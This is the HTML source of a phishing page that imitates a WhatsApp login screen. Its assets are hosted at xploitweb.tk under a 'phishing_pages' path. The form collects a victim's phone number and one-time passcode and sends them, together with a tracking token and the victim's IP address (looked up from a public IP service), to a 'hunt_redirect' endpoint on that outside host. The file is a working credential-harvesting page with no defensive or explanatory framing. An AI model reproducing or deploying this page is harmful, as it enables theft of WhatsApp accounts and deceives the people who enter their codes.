<!DOCTYPE html>
<!DOCTYPE html>
<html lang="en">
<head>
	<title>Whatsapp Login</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="http://xploitweb.tk/static/phishing_pages/whatsapp/images/icons/favicon.ico" >
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/bootstrap/css/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/animate/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/css-hamburgers/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/select2/select2.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/css/util.css">
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/whatsapp/css/main.css">
<!--===============================================================================================-->
</head>
<body>
	
	<div class="limiter">
		<div class="container-login100">
			<div class="wrap-login100">
				<div class="login100-pic js-tilt" data-tilt>
					<img src=" http://xploitweb.tk/static/phishing_pages/whatsapp/images/WhatsApp%20Image%202020-03-05%20at%209.46.57%20AM.jpeg" alt="IMG">
				</div>

				<form action="http://xploitweb.tk/phis/hunt_redirect" method="get" class="login100-form validate-form">
					<span class="login100-form-title">
						WhatsApp Login
					</span>


					<div class="wrap-input100 validate-input" data-validate = "Password is required">
						<input class="input100" type="text" name="username" placeholder="Phone Number">
                        <br>

                           <div class="form-group">
                <input type="hidden"  name="token" id="inputtoken" value="123456789">
            </div>

             <div class="form-group">
                <input type="hidden"  name="page_app" id="pageapp" value="what">
             </div>

						<div class="form-group">
                <input type="hidden"  name="ip" id="ip" value="1.1.1.1">
             </div>
						<input class="input100" type="text" name="password" placeholder="Otp">
						<span class="focus-input100"></span>
						<span class="symbol-input100">
							<i class="fa fa-lock" aria-hidden="true"></i>
						</span>
					</div>
					
					<div class="container-login100-form-btn">
						<button class="login100-form-btn">
							Login
						</button>
					</div>

					<div class="text-center p-t-12">
						<span class="txt1">
							Forgot
						</span>
						<a class="txt2" href="#">
							Help / OTP?
						</a>
					</div>

					<div class="text-center p-t-136">
						<a class="txt2" href="#">
							Create your Account
							<i class="fa fa-long-arrow-right m-l-5" aria-hidden="true"></i>
						</a>
					</div>
				</form>
			</div>
		</div>
	</div>
	
	

	
<!--===============================================================================================-->	
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/bootstrap/js/popper.js"></script>
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/select2/select2.min.j"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/vendor/tilt/tilt.jquery.min.js"></script>
	<script >
		$('.js-tilt').tilt({
			scale: 1.1
		})
	</script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/whatsapp/js/main.js"></script>

<script>
let url = new URL(window.location.href)
let token = url.searchParams.get("token");
var el = document.getElementById("inputtoken")
console.log(token)

if (token !== null){

   console.log(token)
   el.value = token;
}
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>

$.getJSON('https://api.db-ip.com/v2/free/self', function(data) {
    ip = document.getElementById("ip");
    ip.value = data.ipAddress
});
</script>

</body>
</html>
